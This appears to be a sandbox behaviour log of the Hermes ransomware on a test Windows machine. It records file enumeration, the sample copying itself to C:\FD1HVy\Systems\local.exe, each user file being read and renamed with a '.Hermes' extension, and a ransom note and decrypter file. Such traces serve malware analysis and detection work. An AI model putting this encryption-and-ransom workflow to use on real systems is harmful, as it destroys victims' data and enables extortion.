Get Info C:\Users\FD1HVy\Documents\4z4 82v.xlsx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\4z4 82v.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\6jL9GY5.xlsx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\6jL9GY5.xlsx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\6jL9GY5.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\9dHCFyZ_.odt type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\9dHCFyZ_.odt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\9dHCFyZ_.odt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\Am2R.docx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\Am2R.docx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\Am2R.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\IDj9.docx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\IDj9.docx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\IDj9.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\oK6_.pptx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\oK6_.pptx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\oK6_.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\pFdPoLW.docx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\pFdPoLW.docx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\pFdPoLW.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\V_Zl34r.xlsx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\V_Zl34r.xlsx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\V_Zl34r.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx type = file_type True 4
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx type = file_attributes True 1
Fn
Get Info C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Documents\My Shapes\_private\folder.ico type = size, size_out = 0 True 1
Fn
Get Info C:\Users\FD1HVy\Desktop\HOW TO DECRYPT FILES.txt type = file_type True 2
Fn
Get Info C:\FD1HVy\ransom.jpg type = file_type True 2
Fn
Get Info C:\FD1HVy\Hermes-decrypter-new.exe type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Desktop\Hermes-decrypter-new.exe type = file_type True 2
Fn
Get Info C:\Users\FD1HVy\Desktop\Hermes.exe type = file_attributes False 1
Fn
Open \??\C:\Users\FD1HVy\Desktop\Hermes.exe desired_access = FILE_READ_ATTRIBUTES, SYNCHRONIZE, GENERIC_READ, open_options = FILE_SYNCHRONOUS_IO_NONALERT, FILE_NON_DIRECTORY_FILE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Move C:\FD1HVy\Systems\local.exe source_filename = C:\Users\FD1HVy\Desktop\Hermes.exe True 1
Fn
Move C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv.Hermes source_filename = C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv True 1
Fn
Move C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt.Hermes source_filename = C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt True 1
Fn
Move C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi.Hermes source_filename = C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi True 1
Fn
Move C:\Users\FD1HVy\Desktop\dudTlSq3.mp3.Hermes source_filename = C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 True 1
Fn
Move C:\Users\FD1HVy\Desktop\du_y8ZA.bmp.Hermes source_filename = C:\Users\FD1HVy\Desktop\du_y8ZA.bmp True 1
Fn
Move C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv.Hermes source_filename = C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv True 1
Fn
Move C:\Users\FD1HVy\Desktop\kXyvY.bmp.Hermes source_filename = C:\Users\FD1HVy\Desktop\kXyvY.bmp True 1
Fn
Move C:\Users\FD1HVy\Desktop\ljwNeYj.avi.Hermes source_filename = C:\Users\FD1HVy\Desktop\ljwNeYj.avi True 1
Fn
Move C:\Users\FD1HVy\Desktop\mJmzsgIR.avi.Hermes source_filename = C:\Users\FD1HVy\Desktop\mJmzsgIR.avi True 1
Fn
Move C:\Users\FD1HVy\Desktop\NwrDTZ.docx.Hermes source_filename = C:\Users\FD1HVy\Desktop\NwrDTZ.docx True 1
Fn
Move C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi.Hermes source_filename = C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi True 1
Fn
Move C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg.Hermes source_filename = C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg True 1
Fn
Move C:\Users\FD1HVy\Desktop\uy _qJUK.mp3.Hermes source_filename = C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 True 1
Fn
Move C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png.Hermes source_filename = C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png True 1
Fn
Move C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv.Hermes source_filename = C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv True 1
Fn
Move C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls.Hermes source_filename = C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls True 1
Fn
Move C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png.Hermes source_filename = C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png True 1
Fn
Move C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3.Hermes source_filename = C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 True 1
Fn
Move C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg.Hermes source_filename = C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg True 1
Fn
Move C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx.Hermes source_filename = C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx True 1
Fn
Move C:\Users\FD1HVy\Documents\1v32WDK.pptx.Hermes source_filename = C:\Users\FD1HVy\Documents\1v32WDK.pptx True 1
Fn
Move C:\Users\FD1HVy\Documents\4z4 82v.xlsx.Hermes source_filename = C:\Users\FD1HVy\Documents\4z4 82v.xlsx True 1
Fn
Move C:\Users\FD1HVy\Documents\6jL9GY5.xlsx.Hermes source_filename = C:\Users\FD1HVy\Documents\6jL9GY5.xlsx True 1
Fn
Move C:\Users\FD1HVy\Documents\9dHCFyZ_.odt.Hermes source_filename = C:\Users\FD1HVy\Documents\9dHCFyZ_.odt True 1
Fn
Move C:\Users\FD1HVy\Documents\Am2R.docx.Hermes source_filename = C:\Users\FD1HVy\Documents\Am2R.docx True 1
Fn
Move C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx.Hermes source_filename = C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx True 1
Fn
Move C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx.Hermes source_filename = C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx True 1
Fn
Move C:\Users\FD1HVy\Documents\IDj9.docx.Hermes source_filename = C:\Users\FD1HVy\Documents\IDj9.docx True 1
Fn
Move C:\Users\FD1HVy\Documents\oK6_.pptx.Hermes source_filename = C:\Users\FD1HVy\Documents\oK6_.pptx True 1
Fn
Move C:\Users\FD1HVy\Documents\pFdPoLW.docx.Hermes source_filename = C:\Users\FD1HVy\Documents\pFdPoLW.docx True 1
Fn
Move C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx.Hermes source_filename = C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx True 1
Fn
Move C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx.Hermes source_filename = C:\Users\FD1HVy\Documents\v2OWp_Gc8AHT3d4nGyy.docx True 1
Fn
Move C:\Users\FD1HVy\Documents\V_Zl34r.xlsx.Hermes source_filename = C:\Users\FD1HVy\Documents\V_Zl34r.xlsx True 1
Fn
Move C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx.Hermes source_filename = C:\Users\FD1HVy\Documents\X7xxXdVkKAI.pptx True 1
Fn
Move C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx.Hermes source_filename = C:\Users\FD1HVy\Documents\xpmGmPcch3uV.xlsx True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\5hwK.doc True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\NeCh.csv True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\RwxQrbJr.rtf True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\47y8mp0s.csv True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\Hi Fm0SkJi.pdf True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\77bIp480yHDf0\pjQnM18Yq7so0m2EOvAa.csv True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\6Py75SwYl1UPRzmW_N.csv True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\hy UYGYQM9MBJYSeMTx.ppt True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\pFzSit0y49o.odt True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\HhXhtU9gOiLGZ\So7sQ6gpKdfTrbp.ppt True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\43Z39pBBrj.pptx True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\jDPo.xls True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\kryOh-FNUXNCWUA.xls True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\oKefxkUyIL.xls True 1
Fn
Move C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx.Hermes source_filename = C:\Users\FD1HVy\Documents\kqnw_pPQeZHhvh\iPxRamNOgEfL6vt-WkOO\PVOgT\yOtj RSlDnhyJi.xlsx True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config size = 4096, size_out = 4096 True 8
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config size = 4096, size_out = 3215 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Read C:\Users\FD1HVy\Desktop\-t3hSggSt8.csv size = 70595, size_out = 70595 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\-wiWbBcmoqutvw1S.odt size = 27475, size_out = 27475 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\0YuVxzeY9-b4MF.avi size = 92248, size_out = 92248 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\dudTlSq3.mp3 size = 17030, size_out = 17030 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\du_y8ZA.bmp size = 98593, size_out = 98593 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\hIJHv_tpsSRLGQkXt1.mkv size = 34656, size_out = 34656 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\kXyvY.bmp size = 4096, size_out = 1215 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\ljwNeYj.avi size = 85354, size_out = 85354 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\mJmzsgIR.avi size = 4096, size_out = 4072 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\NwrDTZ.docx size = 10116, size_out = 10116 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\OZa1OvHSiPZtGYMnr.avi size = 102377, size_out = 102377 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\RSUbGrWMOv90jjgcKmCA.jpg size = 58462, size_out = 58462 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\uy _qJUK.mp3 size = 54506, size_out = 54506 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\Vmnx49O7kGj.png size = 62349, size_out = 62349 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\K6Z4SfIpaB.mkv size = 91116, size_out = 91116 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\TfNW1f m7CX1OiM.xls size = 24326, size_out = 24326 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\4Mx7zT82zOjgkV9spUg.png size = 26993, size_out = 26993 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\nVeBdFzvpwwtXC.mp3 size = 63275, size_out = 63275 True 1
Fn
Data
Read C:\Users\FD1HVy\Desktop\kUVq_ b-BGEv YRT\fhdgh_AfpkHHBB9_QqtI\Yzb93Q82DMI82wO\teY6IrO7ujB.jpg size = 44332, size_out = 44332 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\--8WWFRhf0b.pptx size = 84584, size_out = 84584 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\1v32WDK.pptx size = 22351, size_out = 22351 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\4z4 82v.xlsx size = 87025, size_out = 87025 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\6jL9GY5.xlsx size = 18894, size_out = 18894 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\9dHCFyZ_.odt size = 89949, size_out = 89949 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\Am2R.docx size = 5811, size_out = 5811 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\ayhyoBKV0xMLiy.docx size = 90307, size_out = 90307 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\BZh3 QA3w.xlsx size = 60731, size_out = 60731 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\IDj9.docx size = 70762, size_out = 70762 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\oK6_.pptx size = 73997, size_out = 73997 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\pFdPoLW.docx size = 49625, size_out = 49625 True 1
Fn
Data
Read C:\Users\FD1HVy\Documents\uZFTfGR0J-cG.pptx size = 87729, size_out = 87729 True 1
Fn
Data
